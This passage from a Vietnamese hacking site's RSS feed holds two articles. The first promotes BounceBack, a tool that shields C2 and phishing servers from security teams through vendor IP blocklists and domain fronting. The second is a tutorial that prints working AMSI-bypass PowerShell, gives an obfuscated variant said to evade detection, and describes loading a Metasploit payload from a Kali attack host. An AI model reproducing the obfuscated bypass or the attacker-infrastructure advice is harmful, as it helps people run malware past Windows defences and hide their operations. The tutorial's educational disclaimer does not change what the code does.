<p style="text-align: center;"><strong><a href="https://github.com/D00Movenok/BounceBack." target="_blank" rel="noopener"><span style="text-decoration: underline;">Link Github</span></a></strong></p>
<figure id="attachment_65341" aria-describedby="caption-attachment-65341" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/bounceback-1.jpg" alt="Giới thiệu về BounceBack" width="800" height="631" title="BounceBack: Lá chắn bảo vệ hạ tầng C2/Phishing khỏi các cuộc tấn công 92"><figcaption id="caption-attachment-65341" class="wp-caption-text">Giới thiệu về BounceBack</figcaption></figure>
<p><span style="color: #339966;"><em><strong>Xem thêm: <a href="https://anonyviet.com/de-digger-cong-cu-tim-file-cua-nguoi-khac-tren-google-drive/">De digger: Công cụ tìm File của người khác trên Google Drive</a></strong></em></span></p>
<h2><strong>Các tính năng nổi bật của BounceBack</strong></h2>
<p>BounceBack sở hữu nhiều tính năng ưu việt giúp bảo vệ hạ tầng của bạn một cách hiệu quả:</p>
<ul>
<li>Hệ thống lọc linh hoạt và tùy biến cao: Với khả năng kết hợp các quy tắc dựa trên boolean (and, or, not), BounceBack có thể che giấu hạ tầng của bạn khỏi những ánh mắt soi mói nhất của đội ngũ bảo mật.</li>
<li>Cấu trúc dự án dễ dàng mở rộng: Mọi người đều có thể thêm quy tắc cho C2 của riêng mình, giúp tăng tính linh hoạt và khả năng tùy biến.</li>
<li>Tích hợp danh sách đen IP khổng lồ: Danh sách này bao gồm các dải IP và pool IPv4 được biết là liên quan đến các nhà cung cấp bảo mật IT, kết hợp với bộ lọc IP để ngăn chặn họ sử dụng/tấn công hạ tầng của bạn.</li>
<li>Trình phân tích cấu hình Malleable C2: BounceBack có thể xác thực lưu lượng HTTP(s) đến dựa trên cấu hình Malleable và từ chối các gói không hợp lệ.</li>
<li>Hỗ trợ Domain Fronting: Tính năng này giúp bạn che giấu hạ tầng của mình hiệu quả hơn.</li>
<li>Kiểm tra vị trí địa lý IP: BounceBack có thể kiểm tra địa chỉ IPv4 của yêu cầu so với dữ liệu tra cứu ngược/địa lý IP và so sánh nó với các biểu thức chính quy được chỉ định để loại trừ các kết nối từ bên ngoài các công ty, quốc gia, thành phố, miền, v.v. được phép.</li>
<li>Bộ lọc thời gian hoạt động: Tất cả các yêu cầu đến có thể được cho phép/không cho phép trong bất kỳ khoảng thời gian nào, vì vậy bạn có thể cấu hình bộ lọc thời gian hoạt động.</li>
<li>Hỗ trợ nhiều proxy: BounceBack hỗ trợ nhiều proxy với các pipeline lọc khác nhau trên cùng một instance.</li>
<li>Cơ chế ghi nhật ký chi tiết: Cho phép bạn theo dõi tất cả các yêu cầu đến và sự kiện để phân tích hành vi của đội ngũ bảo mật và gỡ lỗi sự cố.</li>
</ul>
<figure id="attachment_65343" aria-describedby="caption-attachment-65343" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/bounceback-3.jpg" alt="BounceBack có tích hợp danh sách đen IP khổng lồ" width="800" height="398" title="BounceBack: Lá chắn bảo vệ hạ tầng C2/Phishing khỏi các cuộc tấn công 93"><figcaption id="caption-attachment-65343" class="wp-caption-text">BounceBack có tích hợp danh sách đen IP khổng lồ</figcaption></figure>
<h2><strong>Cơ chế hoạt động của quy tắc</strong></h2>
<p>Ý tưởng chính của các quy tắc là cách BounceBack khớp lưu lượng truy cập. Công cụ hiện hỗ trợ các loại quy tắc sau:</p>
<ul>
<li>Kết hợp quy tắc dựa trên Boolean (and, or, not)</li>
<li>Phân tích IP và subnet</li>
<li>Kiểm tra các trường vị trí địa lý IP</li>
<li>Tra cứu ngược miền</li>
<li>Khớp biểu thức chính quy gói thô</li>
<li>Xác thực lưu lượng truy cập cấu hình Malleable C2</li>
<li>Quy tắc giờ làm việc (hoặc không làm việc)</li>
<li>Quy tắc tùy chỉnh: Có thể dễ dàng thêm các quy tắc tùy chỉnh bằng cách đăng ký <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/default.go#L9" target="_blank" rel="noopener"><strong>RuleBaseCreator</strong></a> hoặc <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/default.go#L3" target="_blank" rel="noopener"><strong>RuleWrapperCreator</strong></a> của bạn. Xem các <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/base_common.go" target="_blank" rel="noopener"><strong>RuleBaseCreator</strong> </a>và <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/wrappers.go" target="_blank" rel="noopener"><strong>RuleWrapperCreator</strong></a> đã được tạo sẵn trong dự án.</li>
</ul>
<p>Bạn có thể tìm thấy trang cấu hình quy tắc <span style="color: #3366ff;"><a style="color: #3366ff;" href="https://github.com/D00Movenok/BounceBack/wiki/1.-Rules" target="_blank" rel="noopener"><span style="text-decoration: underline;"><strong>TẠI ĐÂY</strong></span></a></span></p>
<h2><strong>Cấu hình Proxy và các giao thức được hỗ trợ</strong></h2>
<p>Phần proxy được sử dụng để cấu hình nơi lắng nghe và proxy lưu lượng truy cập, giao thức nào sẽ sử dụng và cách liên kết các quy tắc với nhau để lọc lưu lượng truy cập. Hiện tại, BounceBack hỗ trợ các giao thức sau:</p>
<ul>
<li>HTTP(s): Dành cho hạ tầng web của bạn.</li>
<li>DNS: Dành cho các đường hầm DNS của bạn.</li>
<li>TCP thô (có hoặc không có tls) và UDP: Dành cho các giao thức tùy chỉnh.</li>
<li>Giao thức tùy chỉnh: Có thể dễ dàng thêm các giao thức tùy chỉnh bằng cách đăng ký loại mới của bạn trong <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/proxy/manager.go" target="_blank" rel="noopener"><strong>trình quản lý</strong></a>. Bạn có thể tìm thấy các ví dụ về proxy <span style="color: #3366ff;"><a style="color: #3366ff;" href="https://github.com/D00Movenok/BounceBack/blob/main/internal/proxy" target="_blank" rel="noopener"><strong>tại đây.</strong></a></span></li>
</ul>
<p>Bạn có thể tìm thấy trang cấu hình proxy<span style="text-decoration: underline; color: #339966;"> <strong><a style="color: #339966; text-decoration: underline;" href="https://github.com/D00Movenok/BounceBack/wiki/2.-Proxies" target="_blank" rel="noopener">tại trang này.</a></strong></span></p>
<figure id="attachment_65342" aria-describedby="caption-attachment-65342" style="width: 640px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/bounceback-2.jpg" alt="Cấu hình Proxy và các giao thức được hỗ trợ" width="640" height="420" title="BounceBack: Lá chắn bảo vệ hạ tầng C2/Phishing khỏi các cuộc tấn công 94"><figcaption id="caption-attachment-65342" class="wp-caption-text">Cấu hình Proxy và các giao thức được hỗ trợ</figcaption></figure>
<h2><strong>Hướng dẫn cài đặt BounceBack</strong></h2>
<h3><strong>Cách 1: Cài đặt từ bản phát hành</strong></h3>
<p>Tải xuống bản phát hành mới nhất từ <strong><a href="https://github.com/D00Movenok/BounceBack/releases" target="_blank" rel="noopener"><span style="text-decoration: underline;">trang này</span></a></strong> &gt; Giải nén thư mục &gt; Chỉnh sửa file cấu hình &gt; Khởi chạy BounceBack.</p>
<h3><strong>Cách 2: Cài đặt từ mã nguồn</strong></h3>
<p>Clone dự án (đừng quên <a href="https://git-lfs.com/" target="_blank" rel="noopener"><strong>GitLFS</strong>)</a> &gt; Cài đặt<strong><a href="https://goreleaser.com/install/" target="_blank" rel="noopener"> goreleaser</a> </strong>&gt; Chạy lệnh:</p>
<p><code>goreleaser release --clean --snapshot</code></p>
<h2><strong>Cách sử dụng BounceBack</strong></h2>
<p><strong>Bước 1 (tùy chọn):</strong> Cập nhật danh sách banned_ips.txt:</p>
<p><code>list:bash scripts/collect_banned_ips.sh &gt; data/banned_ips.txt</code></p>
<p><strong>Bước 2:</strong> Chỉnh sửa config.yml cho nhu cầu: Cấu hình các quy tắc để khớp lưu lượng truy cập, proxy để phân tích lưu lượng truy cập bằng các quy tắc và các biến toàn cục để cấu hình quy tắc chuyên sâu.</p>
<p><strong>Bước 3:</strong> Chạy BounceBack: ./bounceback</p>
<p><strong>Các tùy chọn dòng lệnh:</strong></p>
<ul>
<li>-c, &#8211;config string: Đường dẫn đến tệp cấu hình ở định dạng YAML (mặc định là &#8220;config.yml&#8221;).</li>
<li>-l, &#8211;log string: Đường dẫn đến tệp nhật ký (mặc định là &#8220;bounceback.log&#8221;).</li>
<li>-v, &#8211;verbose count: Ghi nhật ký chi tiết (0 = thông tin, 1 = gỡ lỗi, 2+ = theo dõi).</li>
</ul>
<p><span style="color: #339966;"><em><strong>Xem thêm: <a href="https://anonyviet.com/dns-spy-cong-cu-phan-tich-dns-cua-domain-bat-ky/">DNS Spy: Công cụ phân tích DNS của Domain bất kỳ</a></strong></em></span></p>
<h2><strong>Lời Kết</strong></h2>
<p><strong>BounceBack</strong> là một công cụ linh hoạt giúp bảo vệ hạ tầng C2/phishing. Với khả năng tùy chỉnh cao, hệ thống lọc linh hoạt và hỗ trợ đa dạng các giao thức, BounceBack là một lựa chọn lý tưởng để nâng cao an ninh cho hệ thống của bạn.</p>
<div id="eJOY__extension_root" class="eJOY__extension_root_class"></div>
<h2>Câu hỏi thường gặp</h2>
<h3>BounceBack bảo vệ hạ tầng C2/Phishing như thế nào?</h3>
<p>BounceBack hoạt động như một reverse proxy mạnh mẽ, sử dụng hệ thống lọc thông minh và tích hợp WAF để che giấu hạ tầng của bạn khỏi các cuộc tấn công và sự dòm ngó của các công cụ bảo mật. Nó cho phép tùy chỉnh cao và hỗ trợ nhiều giao thức.</p>
<h3>Tôi có thể tùy chỉnh BounceBack để phù hợp với nhu cầu của mình không?</h3>
<p>Hoàn toàn có thể! BounceBack cho phép tùy chỉnh cao thông qua các quy tắc dựa trên Boolean, khả năng thêm các quy tắc tùy chỉnh, và hỗ trợ nhiều proxy với các pipeline lọc khác nhau.</p>
<h3>BounceBack hỗ trợ những giao thức nào?</h3>
<p>BounceBack hỗ trợ HTTP(s), DNS, TCP/UDP thô, và cho phép thêm các giao thức tùy chỉnh.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/bounceback-la-chan-bao-ve-ha-tang-c2-phishing-khoi-cac-cuoc-tan-cong/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bypass AMSI và thực thi mã độc trên Windows</title>
		<link>https://anonyviet.com/bypass-amsi-va-thuc-thi-ma-doc-tren-windows/</link>
					<comments>https://anonyviet.com/bypass-amsi-va-thuc-thi-ma-doc-tren-windows/#comments</comments>
		
		<dc:creator><![CDATA[Hevin]]></dc:creator>
		<pubDate>Sun, 03 Nov 2024 02:57:17 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[AMSI]]></category>
		<category><![CDATA[bypass]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=71129</guid>

					<description><![CDATA[Trong môi trường bảo mật Windows, Microsoft đã phát triển AMSI (Antimalware Scan Interface) như một lớp bảo vệ nhằm phát hiện và ngăn chặn mã độc. AMSI được thiết kế để quét và phát hiện ra các dấu hiệu của mã độc có trong các chương trình như PowerShell, macro VBA,&#8230; Tuy nhiên, các [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Trong môi trường bảo mật Windows, Microsoft đã phát triển AMSI (Antimalware Scan Interface) như một lớp bảo vệ nhằm phát hiện và ngăn chặn mã độc. AMSI được thiết kế để quét và phát hiện ra các dấu hiệu của mã độc có trong các chương trình như PowerShell, macro VBA,&#8230; Tuy nhiên, các hacker không ngừng tìm kiếm những cách thức để qua mặt cơ chế bảo vệ này, từ việc mã hóa, làm rối mã (obfuscation), cho đến các kỹ thuật can thiệp trực tiếp vào AMSI.</p>
<p>Trong bài viết này, mình sẽ giải thích cách thức của kĩ thuật này và vì sao nó có thể qua mặt được cơ chế bảo vệ của Microsoft. Hãy cùng đi sâu vào chi tiết để hiểu rõ hơn về cách AMSI hoạt động và tại sao nó có thể bị vượt qua.</p>
<p style="text-align: center;"><strong><span style="color: #ff0000;">Lưu ý:</span> <span style="color: #0000ff;">Bài viết chỉ mang tính chất giáo dục, vui lòng không thực hiện các cuộc tấn công phạm pháp nào. Anonyviet không chịu toàn bộ trách nhiệm mà bạn đã gây ra !</span></strong></p>
<h2><strong>AMSI là gì ? </strong></h2>
<p>AMSI (Antimalware Scan Interface) là một cơ chế bảo mật được tích hợp sẵn trên Windows, cho phép các phần mềm chống mã độc quét và phân tích dữ liệu đáng ngờ ngay khi dữ liệu được tải về hoặc chuẩn bị thực thi. Thông qua AMSI, các ứng dụng có thể yêu cầu quét nội dung trước khi lưu trữ hoặc thực thi, nhằm phát hiện sớm các dấu hiệu của mã độc và ngăn chặn mối đe dọa tiềm ẩn. Tuy nhiên, nếu mã độc có thể vô hiệu hóa cơ chế này, nó có thể dễ dàng qua mặt các phần mềm bảo mật, từ đó xâm nhập vào hệ thống mà không bị phát hiện.</p>
<h2><strong>AMSI hoạt động như thế nào ?</strong></h2>
<p>Khi người dùng thực thi một script hoặc khởi chạy PowerShell, tệp “amsi.dll” sẽ được chèn vào không gian bộ nhớ của tiến trình. Trước khi thực thi, hai API sau được phần mềm AntiVirus sử dụng để quét bộ đệm và chuỗi để phát hiện dấu hiệu của phần mềm độc hại:</p>
<ol>
<li><strong>AmsiScanBuffer</strong>: được sử dụng để quét một vùng bộ nhớ (buffer) bất kỳ để phát hiện phần mềm độc hại. Thông thường, vùng bộ nhớ này chứa code mà một chương trình như PowerShell, VBA,… đang cố gắng thực thi. AmsiScanBuffer sẽ nhận dữ liệu từ vùng bộ nhớ của tiến trình hiện tại, sau đó gửi dữ liệu này cho phần mềm diệt virus để phân tích và so sánh với các chữ ký hoặc mẫu mã độc đã biết. Nếu phát hiện mã độc, sẽ có kết quả thông báo cho biết mã này có dấu hiệu của phần mềm độc hại và sẽ ngăn chặn không cho thực thi.</li>
<li><strong>AmsiScanString</strong>: được thiết kế để quét một chuỗi ký tự (string) cụ thể nhằm phát hiện các đoạn mã độc hại. Chuỗi này có thể là mã nguồn của một đoạn code hoặc bất kỳ nội dung văn bản nào mà chương trình đang xử lý. Khi một đoạn mã hoặc một chuỗi văn bản được tải vào bộ nhớ và chuẩn bị thực thi, AmsiScanString sẽ quét nội dung chuỗi đó. Tương tự như AmsiScanBuffer, nếu tìm thấy các mẫu mã độc, hàm sẽ ngăn không cho mã được thực thi và cảnh báo người dùng.</li>
</ol>
<p>Bạn có thể xem bức hình dưới đây để dễ hình dung hơn cách AMSI hoạt động</p>
<p><strong><img decoding="async" class="aligncenter " src="https://anonyviet.com/wp-content/uploads/2024/11/a-computer-screen-with-text-and-icons-description.png" alt="Bypass AMSI và thực thi mã độc trên Windows" width="508" height="400" title="Bypass AMSI và thực thi mã độc trên Windows 100"></strong></p>
<p>Như vậy, AmsiScanBuffer thường dùng để quét toàn bộ vùng bộ nhớ lớn chứa mã, còn AmsiScanString chủ yếu dùng cho các chuỗi ký tự cụ thể hoặc các đoạn mã ngắn.</p>
<p>Chính vì do việc quét dựa trên chữ ký nhận diện, các hacker có thể Bypass AMSI bằng cách sử dụng nhiều chiến thuật khác nhau. Mặc dù một số kỹ thuật đã bị chặn, nhưng việc thay đổi chuỗi và biến, mã hóa và làm rối mã lại có thể giúp cho hacker vượt qua dễ dàng hơn kể cả khi dùng tới các kĩ thuật cũ.</p>
<h2><strong>Demo kĩ thuật Bypass AMSI và thực thi mã độc từ xa trên Windows 11</strong></h2>
<p>Sau một thời gian nghiên cứu thì mình đã tìm được một đoạn script Powershell để làm kĩ thuật này, đoạn mã có nội dung như sau:</p>
<table>
<tbody>
<tr>
<td>1</p>
<p>2</p>
<p>3</td>
<td>$AmsiUtils = [Ref].Assembly.GetType(&#8216;System.Management.Automation.AmsiUtils&#8217;)</p>
<p>$AmsiInitFailed = $AmsiUtils.GetField(&#8216;amsiInitFailed&#8217;, &#8216;NonPublic,Static&#8217;)</p>
<p>$AmsiInitFailed.SetValue($null, $true)</td>
</tr>
</tbody>
</table>
<p>Ở dòng code đầu tiên, biến “$AmsiUtils” sẽ chứa thông tin về Class “AmsiUtils” trong .NET Assembly cho phép truy cập vào thành phần và phương thức của Class “AmsiUtils”. Chi tiết như sau:</p>
<ul>
<li>[Ref] : Đây là một kiểu dữ liệu trong .NET cho phép bạn làm việc với tham chiếu đối tượng</li>
<li>“.Assembly”: trỏ đến assembly (tập hợp mã) của Class “AmsiUtils”</li>
<li>“GetType(&#8216;System.Management.Automation.AmsiUtils&#8217;)” tìm Class có tên là “AmsiUtils” trong namespace “System.Management.Automation”, nơi chứa các thành phần hỗ trợ cho PowerShell.</li>
</ul>
<p>Dòng code thứ hai sử dụng để lấy tham chiếu đến trường ( hay còn gọi là field ) “amsiInitFailed” của Class “AmsiUtils”. Biến “$AmsiInitFailed” sẽ chứa thông tin về field “amsiInitFailed”, cho phép thay đổi giá trị của nó. Chi tiết như sau:</p>
<ul>
<li>“GetField(&#8216;amsiInitFailed&#8217;, &#8216;NonPublic,Static&#8217;)” tìm field có tên “amsiInitFailed” với thuộc tính không công khai “NonPublic” và field tĩnh “Static”</li>
<li>Field “amsiInitFailed” này dùng để kiểm tra trạng thái khởi tạo của AMSI, nếu trả về kết quả là “true”, điều đó cho thấy AMSI đã không được khởi tạo thành công</li>
</ul>
<p>Đến với dòng code cuối cùng, với dòng code này sẽ thay đổi giá trị của field “amsiInitFailed” thành “true”. Sau khi chạy dòng này, AMSI sẽ bị vô hiệu hóa và bất kỳ mã độc nào có thể thực thi mà không bị phát hiện. Chi tiết như sau:</p>
<ul>
<li>“SetValue($null, $true)” được sử dụng để thiết lập giá trị của field “amsiInitFailed”. Với tham số đầu tiên là “$null” vì không có đối tượng cụ thể nào để áp dụng giá trị cho trường tĩnh (static field)</li>
<li>Bằng cách đặt giá trị này thành “true” là để đánh lừa PowerShell rằng AMSI đã không được khởi tạo, do đó AMSI không quét các tập lệnh PowerShell và cho phép mã độc thực thi. Đọc đến đây, mình khuyên bạn đừng tin tưởng quá vào bất cứ ai nhé, nếu không bạn sẽ bị lừa giống như AMSI đó =))</li>
</ul>
<p>Với đoạn code trên đã quá phổ biến, vậy nên khi thực thi, AMSI sẽ phát hiện và ngăn chặn.</p>
<p><img decoding="async" class="alignnone " src="https://anonyviet.com/wp-content/uploads/2024/11/word-image-71129-2.png" alt="bypass antivirus windows" width="1372" height="346" title="Bypass AMSI và thực thi mã độc trên Windows 101"></p>
<p>Vậy làm cách nào mình vẫn thực thi được script Powershell đó ? Đơn giản thôi, mình sẽ xáo trộn đoạn mã đó. Mình đã sử dụng công cụ có tên là <a href="https://github.com/RythmStick/AMSITrigger" target="_blank" rel="noopener">AmsiTrigger</a> được phát triển bởi RythmStick, với công cụ này đã giúp mình tìm ra các phần “nhạy cảm” trong đoạn code Bypass AMSI</p>
<p><img decoding="async" class="aligncenter " src="https://anonyviet.com/wp-content/uploads/2024/11/a-computer-screen-with-text-and-images-descriptio.png" alt="Bypass AMSI windows" width="875" height="534" title="Bypass AMSI và thực thi mã độc trên Windows 102"></p>
<p>Bây giờ mình sẽ thay đổi tên biến, xáo trộn các string mà AmsiTrigger đã đưa ra có trong đoạn code, và đây là đoạn mã đã được xáo trộn:</p>
<p><code>$m1='A';$m3='i';$m2='ms';$m=$m1+$m2+$m3;$a1='am';$a2='si';$a3='Ini';$a4='tFa';$a5='il';$a6='ed';$a=$a1+$a2+$a3+$a4+$a5+$a6;$b1='No';$b2='nPu';$b3='bli';$b4='c,St';$b5='at';$b6='ic';$b=$b1+$b2+$b3+$b4+$b5+$b6;$ex=$null;$extra1=</code>[Ref];$extra2=$extra1.Assembly;$extra3=$extra2.GetType(&#8216;System.Management.Automation.&#8217;+$m+&#8217;U&#8217;+&#8217;tils&#8217;);$test=$extra3.GetField($a,$b);$test.SetValue($ex,$true)</p>
<p>Sau khi xáo trộn, đoạn code đã thực thi thành công !</p>
<p><img decoding="async" class="aligncenter " src="https://anonyviet.com/wp-content/uploads/2024/11/word-image-71129-4.png" alt="mã hóa code" width="600" height="75" title="Bypass AMSI và thực thi mã độc trên Windows 103"></p>
<p>Mọi thứ có vẻ đã ổn, giờ thì thử thực thi một đoạn code độc hại nào đó xem sao, mình sẽ tạo payload Powershell của Metasploit có tên là meter.ps1, sau đó mở server bên phía máy tấn công là Kali Linux để lưu trữ file này</p>
<p><img decoding="async" class="aligncenter " src="https://anonyviet.com/wp-content/uploads/2024/11/word-image-71129-5.png" alt="powershell rối mã " width="1590" height="382" title="Bypass AMSI và thực thi mã độc trên Windows 104"></p>
<h3>Sau đây là video Demo</h3>
<p><iframe loading="lazy" class="wp-embedded-content" sandbox="allow-scripts" security="restricted" title="DemoAmsiBypass" src="https://streamable.com/o/4pewfe#?secret=nC1Bay56Q2" data-secret="nC1Bay56Q2" frameborder="0" scrolling="no" width="1278" height="684"></iframe></p>
<p>AMSI đóng vai trò như một lớp phòng thủ thiết yếu trên Windows, nhưng như chúng ta đã thấy, vẫn tồn tại những phương pháp để vượt qua. Việc áp dụng mã hóa, làm rối mã (obfuscation), và thao tác trực tiếp trên các trường nội bộ có thể giúp mã độc tránh bị phát hiện, đặt ra thách thức không nhỏ cho các giải pháp bảo mật.</p>
<p>Bằng cách nghiên cứu về AMSI và các kỹ thuật bypass, chúng ta có thể chuẩn bị tốt hơn trước các mối đe dọa và bảo mật hệ thống một cách hiệu quả hơn. Đối với các chuyên gia an ninh mạng, việc hiểu rõ các kỹ thuật này không chỉ giúp củng cố hàng rào phòng thủ mà còn giúp nâng cao khả năng phát hiện và ứng phó với các cuộc tấn công mạng ngày càng phức tạp.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>AMSI là gì và tại sao nó quan trọng?</h3>
<p>AMSI (Antimalware Scan Interface) là một giao diện bảo mật tích hợp trong Windows, cho phép phần mềm diệt virus quét mã trước khi thực thi, giúp ngăn chặn mã độc.  Việc hiểu cách hoạt động của AMSI rất quan trọng để bảo vệ hệ thống khỏi các mối đe dọa.</p>
<h3>Làm thế nào các hacker có thể vượt qua AMSI?</h3>
<p>Các hacker sử dụng nhiều kỹ thuật để vượt qua AMSI, bao gồm mã hóa, làm rối mã (obfuscation) và can thiệp trực tiếp vào các hàm của AMSI.  Việc thay đổi tên biến, xáo trộn chuỗi mã cũng là một cách hiệu quả để qua mặt hệ thống quét.</p>
<h3>Bài viết này có khuyến khích hoạt động bất hợp pháp không?</h3>
<p>Không. Bài viết chỉ mang tính chất giáo dục, nhằm giúp người đọc hiểu rõ hơn về cơ chế hoạt động của AMSI và cách thức nó có thể bị vượt qua.  Việc sử dụng kiến thức này cho mục đích bất hợp pháp là hoàn toàn trái pháp luật và người đọc tự chịu trách nhiệm về hành vi của mình.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/bypass-amsi-va-thuc-thi-ma-doc-tren-windows/feed/</wfw:commentRss>
			<slash:comments>4</slash:comments>
		
		
			</item>
	</channel>
</rss>
